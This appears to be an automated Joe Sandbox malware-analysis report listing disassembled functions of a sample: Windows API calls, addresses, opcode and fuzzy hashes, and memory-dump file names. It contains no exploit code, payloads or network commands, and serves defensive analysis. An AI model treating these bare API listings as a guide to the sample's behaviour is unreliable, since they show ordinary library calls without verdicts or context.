                                              • Opcode ID: d3314d67b6583853150ea6245476ad99e0b531ed0827a01dedfa40b3ca1480b6
                                              • Instruction ID: cdd6bc9043d5a05fad498b53200cf055727fac6ba1da6e52705a18063ccbf8ff
                                              • Opcode Fuzzy Hash: d3314d67b6583853150ea6245476ad99e0b531ed0827a01dedfa40b3ca1480b6
                                              • Instruction Fuzzy Hash: D1A14775204B019FD711EF54C885B6AB7E8BF89310F148959F99A9B3A2CB34FD04CB92
                                              APIs
                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,000C3C4C,?), ref: 00088308
                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,000C3C4C,?), ref: 00088320
                                              • CLSIDFromProgID.OLE32(?,?,00000000,000C0988,000000FF,?,00000000,00000800,00000000,?,000C3C4C,?), ref: 00088345
                                              • _memcmp.LIBCMT ref: 00088366
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: FromProg$FreeTask_memcmp
                                              • String ID:
                                              • API String ID: 314563124-0
                                              • Opcode ID: 4f50bd327b22290cda734441f8a11055053a7e679b1134e79bb8631c494070f3
                                              • Instruction ID: 7176d1499f2fea18c3bd3144b26a4089608df3da8b970bf03071e611a5f2d73b
                                              • Opcode Fuzzy Hash: 4f50bd327b22290cda734441f8a11055053a7e679b1134e79bb8631c494070f3
                                              • Instruction Fuzzy Hash: 8B812B71A00109EFCB04DFD4C988EEEB7B9FF89315F208558E546AB250DB71AE06CB60
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                              • String ID:
                                              • API String ID: 2782032738-0
                                              • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                              • Instruction ID: 309fa2a6dec138398c1396154bbf1d92eb51edfecd63cb0e15f3205f0141f37a
                                              • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                              • Instruction Fuzzy Hash: 4841D535A00706ABDF688E69C8859EF77E5EF8036AB24813DEC59C7680D7709DC88B45
                                              APIs
                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0008A68A
                                              • __itow.LIBCMT ref: 0008A6BB
                                                • Part of subcall function 0008A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0008A976
                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0008A724
                                              • __itow.LIBCMT ref: 0008A77B
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: MessageSend$__itow
                                              • String ID:
                                              • API String ID: 3379773720-0
                                              • Opcode ID: 4bcfdeea651daf60db947782f63f21f192d2e5daa9331323a087b2d69a4b53cd
                                              • Instruction ID: 7e8dc7a207179c4f0d6a7c430a928a461f88bb1b2467182aa248f0fa92d310ba
                                              • Opcode Fuzzy Hash: 4bcfdeea651daf60db947782f63f21f192d2e5daa9331323a087b2d69a4b53cd
                                              • Instruction Fuzzy Hash: FE4173B4B00209ABEF11EF54CC45BEE7BB9EF49750F04002AF945A3282DB749994DB96
                                              APIs
                                              • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,000C0980), ref: 000A6B92
                                              • _strlen.LIBCMT ref: 000A6BC4
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: _strlen
                                              • String ID:
                                              • API String ID: 4218353326-0
                                              • Opcode ID: 0c0d9247e1b63bddc915bed619b06d8f4453ac5a8c3b033511936113f8c1ac70
                                              • Instruction ID: bebaca361586706969f38009cbb893561a099c2eb5d7ad401370c101df4797de
                                              • Opcode Fuzzy Hash: 0c0d9247e1b63bddc915bed619b06d8f4453ac5a8c3b033511936113f8c1ac70
                                              • Instruction Fuzzy Hash: FC416F71A00108ABCB14FBA4DC95EFEB3B9EF55310F188165F85A9B293DB31AD45CB90
                                              APIs
                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0006642B
                                              • __isleadbyte_l.LIBCMT ref: 00066459
                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00066487
                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 000664BD
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                              • String ID:
                                              • API String ID: 3058430110-0
                                              • Opcode ID: ae5b2787d2f4e820a9b6d29556b22c885541f7b2152b883657c2fa0b479923f0
                                              • Instruction ID: d2dcd405233a08e3fcc21f83ef6077411b2047b2611a95d73476b71b53a157bb
                                              • Opcode Fuzzy Hash: ae5b2787d2f4e820a9b6d29556b22c885541f7b2152b883657c2fa0b479923f0
                                              • Instruction Fuzzy Hash: ED31AD31604256AFDB218F65CC44BBBBBEAFF41360F154169F864871A1EF32E890DB90
                                              APIs
                                                • Part of subcall function 000329E2: GetWindowLongW.USER32(?,000000EB), ref: 000329F3
                                              • GetCursorPos.USER32(?), ref: 000BCB7A
                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0006BCEC,?,?,?,?,?), ref: 000BCB8F
                                              • GetCursorPos.USER32(?), ref: 000BCBDC
                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0006BCEC,?,?,?), ref: 000BCC16
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                              • String ID:
                                              • API String ID: 2864067406-0
                                              • Opcode ID: 9726429233d36599b00d8ead102ef499966035a6ee6286cf8fe8ce71a642b19e
                                              • Instruction ID: d24b578bbb0320aafe57c8df60b8633380b90ffacaa04bfd1521d612fabc217c
                                              • Opcode Fuzzy Hash: 9726429233d36599b00d8ead102ef499966035a6ee6286cf8fe8ce71a642b19e
                                              • Instruction Fuzzy Hash: 08318B35600118AFEB258F59CC99EFE7BF9EB49310F044099F9099B262C735AD51EFA0
                                              APIs
                                              • GetWindowLongW.USER32(?,000000EC), ref: 000B63BD
                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 000B63D7
                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 000B63E5
                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 000B63F3
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Window$Long$AttributesLayered
                                              • String ID:
                                              • API String ID: 2169480361-0
                                              • Opcode ID: 91b3ce7f3dc1aa66bc046e527fb1797104551dda21e56ec260eee7fad46baf38
                                              • Instruction ID: 39fd94bfc6287e1e9258003d2218c3a8803558ef0ffe091836fa01037d29af36
                                              • Opcode Fuzzy Hash: 91b3ce7f3dc1aa66bc046e527fb1797104551dda21e56ec260eee7fad46baf38
                                              • Instruction Fuzzy Hash: 5211DF31300414AFE705AB24CC54FFE7798EF45720F144118F916CB2E2CBAAAD00CB90
                                              APIs
                                                • Part of subcall function 0008F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0008E46F,?,?,?,0008F262,00000000,000000EF,00000119,?,?), ref: 0008F867
                                                • Part of subcall function 0008F858: lstrcpyW.KERNEL32(00000000,?), ref: 0008F88D
                                                • Part of subcall function 0008F858: lstrcmpiW.KERNEL32(00000000,?,0008E46F,?,?,?,0008F262,00000000,000000EF,00000119,?,?), ref: 0008F8BE
                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0008F262,00000000,000000EF,00000119,?,?,00000000), ref: 0008E488
                                              • lstrcpyW.KERNEL32(00000000,?), ref: 0008E4AE
                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,0008F262,00000000,000000EF,00000119,?,?,00000000), ref: 0008E4E2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: lstrcmpilstrcpylstrlen
                                              • String ID: cdecl
                                              • API String ID: 4031866154-3896280584
                                              • Opcode ID: 6ae8e0cb2c6f1b672f0b02bcc446ca2c9fe81a560cad15b797e20a2dc75c6aa9
                                              • Instruction ID: 33af602a050889b8d694703934a5ce6256c0106d459e51beb9e8396bd06ab348
                                              • Opcode Fuzzy Hash: 6ae8e0cb2c6f1b672f0b02bcc446ca2c9fe81a560cad15b797e20a2dc75c6aa9
                                              • Instruction Fuzzy Hash: 4511E23A200385EFDB25AF34DC45DBE77A9FF45350B40402AF84ACB2A0EB719940C791
                                              APIs
                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00094385
                                              • _memset.LIBCMT ref: 000943A6
                                              • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 000943F8
                                              • CloseHandle.KERNEL32(00000000), ref: 00094401
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: CloseControlCreateDeviceFileHandle_memset
                                              • String ID:
                                              • API String ID: 1157408455-0
                                              • Opcode ID: 680ded519c7e64973cc9cab60495cecc101276dd61ce91cd6ca1610bf920b6d2
                                              • Instruction ID: c017c5f73c356cd759ad055ad7f54ebd2cba847944d9f43f4d07ae961dd11d95
                                              • Opcode Fuzzy Hash: 680ded519c7e64973cc9cab60495cecc101276dd61ce91cd6ca1610bf920b6d2
                                              • Instruction Fuzzy Hash: 5911AB75901228BAE7309BA5AC4DFEBBB7CEF45760F10459AF908D7190D6744F80CBA4
                                              APIs
                                                • Part of subcall function 0004402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00097E51,?,?,00000000), ref: 00044041
                                                • Part of subcall function 0004402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00097E51,?,?,00000000,?,?), ref: 00044065
                                              • gethostbyname.WSOCK32(?,?,?), ref: 000A6A84
                                              • WSAGetLastError.WSOCK32(00000000), ref: 000A6A8F
                                              • _memmove.LIBCMT ref: 000A6ABC
                                              • inet_ntoa.WSOCK32(?), ref: 000A6AC7
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                              • String ID:
                                              • API String ID: 1504782959-0
                                              • Opcode ID: 0c5341218efcaa67e93547422f57e1a4d7ed19505d25d41a78f3ce1eeb520872
                                              • Instruction ID: 8bd1e8af7a3b89ea4862275a4f569f87b9b5b72aec477142bb37a7b6ad6001c9
                                              • Opcode Fuzzy Hash: 0c5341218efcaa67e93547422f57e1a4d7ed19505d25d41a78f3ce1eeb520872
                                              • Instruction Fuzzy Hash: 54115E76900108EFCB04EFA4CD86DEEB7B8EF15310B148165F506A72A2DF31AE14DBA1
                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0003214F
                                              • GetStockObject.GDI32(00000011), ref: 00032163
                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 0003216D
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: CreateMessageObjectSendStockWindow
                                              • String ID:
                                              • API String ID: 3970641297-0
                                              • Opcode ID: 5a5baace4d5e78169d2030432184116ca235ef3e90fd5aee079878b7d4ae1a0f
                                              • Instruction ID: 9b46e1b9add8043d4066153689cdbac4691c2210ac4b64985c24e5c53c8b1bc6
                                              • Opcode Fuzzy Hash: 5a5baace4d5e78169d2030432184116ca235ef3e90fd5aee079878b7d4ae1a0f
                                              • Instruction Fuzzy Hash: C2118B72501209BFEB124F949D44EEABBADEF68394F040201FB1452110C7359C60EBA0
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 000BE1EA
                                              • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 000BE201
                                              • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 000BE216
                                              • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 000BE234
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Type$Register$FileLoadModuleNameUser
                                              • String ID:
                                              • API String ID: 1352324309-0
                                              • Opcode ID: 386eb6db91301c0a1bb75e25294a220134940a0e89f125be396eda6654114d33
                                              • Instruction ID: 5aec5350c6f50d373924a81cb24fdee31efcce4cbd6e020b7c35fa924a255314
                                              • Opcode Fuzzy Hash: 386eb6db91301c0a1bb75e25294a220134940a0e89f125be396eda6654114d33
                                              • Instruction Fuzzy Hash: 44116DB5206348DFE3348F51ED09FD7BBBCEB00B04F108A59A61AD6150D7B5E908EBA1
                                              APIs
                                                • Part of subcall function 000316CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00031729
                                                • Part of subcall function 000316CF: SelectObject.GDI32(?,00000000), ref: 00031738
                                                • Part of subcall function 000316CF: BeginPath.GDI32(?), ref: 0003174F
                                                • Part of subcall function 000316CF: SelectObject.GDI32(?,00000000), ref: 00031778
                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 000BC3E8
                                              • LineTo.GDI32(00000000,?,?), ref: 000BC3F5
                                              • EndPath.GDI32(00000000), ref: 000BC405
                                              • StrokePath.GDI32(00000000), ref: 000BC413
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                              • String ID:
                                              • API String ID: 1539411459-0
                                              • Opcode ID: 504e60cc8925a679f85e60d1c3947ab1eaec88b961f668979d050cce09fd8e73
                                              • Instruction ID: 5975c04264c53f809e228e03e79843189940bdc9c45dd1c26fe143610c6d1948
                                              • Opcode Fuzzy Hash: 504e60cc8925a679f85e60d1c3947ab1eaec88b961f668979d050cce09fd8e73
                                              • Instruction Fuzzy Hash: 76F0BE31045219FAFB132F90AC0EFDE3F99AF05311F188000FA51210E287781A91DBAA
                                              APIs
                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0008AA6F
                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0008AA82
                                              • GetCurrentThreadId.KERNEL32 ref: 0008AA89
                                              • AttachThreadInput.USER32(00000000), ref: 0008AA90
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                              • String ID:
                                              • API String ID: 2710830443-0
                                              • Opcode ID: 643ca9cb92fd7deda930fbd98091a1d41450a72779d4f5ecbcddb56b274009f6
                                              • Instruction ID: 40f14529fdcfe2ed7ad9c2d5db4696b963839a38538f71a7703d862b3a74c823
                                              • Opcode Fuzzy Hash: 643ca9cb92fd7deda930fbd98091a1d41450a72779d4f5ecbcddb56b274009f6
                                              • Instruction Fuzzy Hash: 7CE06D31641228BAFB216FA2DD0CEEB7F5CFF127A1F048012F94984890C7768550CBE1
                                              APIs
                                              • GetSysColor.USER32(00000008), ref: 0003260D
                                              • SetTextColor.GDI32(?,000000FF), ref: 00032617
                                              • SetBkMode.GDI32(?,00000001), ref: 0003262C
                                              • GetStockObject.GDI32(00000005), ref: 00032634
                                              • GetWindowDC.USER32(?,00000000), ref: 0006C1C4
                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0006C1D1
                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0006C1EA
                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0006C203
                                              • GetPixel.GDI32(00000000,?,?), ref: 0006C223
                                              • ReleaseDC.USER32(?,00000000), ref: 0006C22E
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                              • String ID:
                                              • API String ID: 1946975507-0
                                              • Opcode ID: a6e6906ef66acb56092fae5ca49937f18c433a327a48c90107a7baef3294e854
                                              • Instruction ID: 468aeb7d3753fabb6ccc4645bbd01950abcd1f418c060a120e1f8e0c6e8022f2
                                              • Opcode Fuzzy Hash: a6e6906ef66acb56092fae5ca49937f18c433a327a48c90107a7baef3294e854
                                              • Instruction Fuzzy Hash: 59E06D31504244FBFB625FA8AC4DFE87B51EB05332F088366FEA9880E187754980DB11
                                              APIs
                                              • GetDesktopWindow.USER32 ref: 00070679
                                              • GetDC.USER32(00000000), ref: 00070683
                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 000706A3
                                              • ReleaseDC.USER32(?), ref: 000706C4
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: CapsDesktopDeviceReleaseWindow
                                              • String ID:
                                              • API String ID: 2889604237-0
                                              • Opcode ID: e223e98ca8124cb520085c996c15fa7ea42af46d405b6d3a0cb766f954944eed
                                              • Instruction ID: 9fa9d4a4f4e9c387d1b1b55a7c058fcb0e24d31ca6891bdacfe7c099dc77f41c
                                              • Opcode Fuzzy Hash: e223e98ca8124cb520085c996c15fa7ea42af46d405b6d3a0cb766f954944eed
                                              • Instruction Fuzzy Hash: 2AE012B1800204EFEF129FA0D808BADBBF5EB8C310F218009F85AA7210CB3C9551DF50
                                              APIs
                                              • GetDesktopWindow.USER32 ref: 0007068D
                                              • GetDC.USER32(00000000), ref: 00070697
                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 000706A3
                                              • ReleaseDC.USER32(?), ref: 000706C4
                                              Memory Dump Source
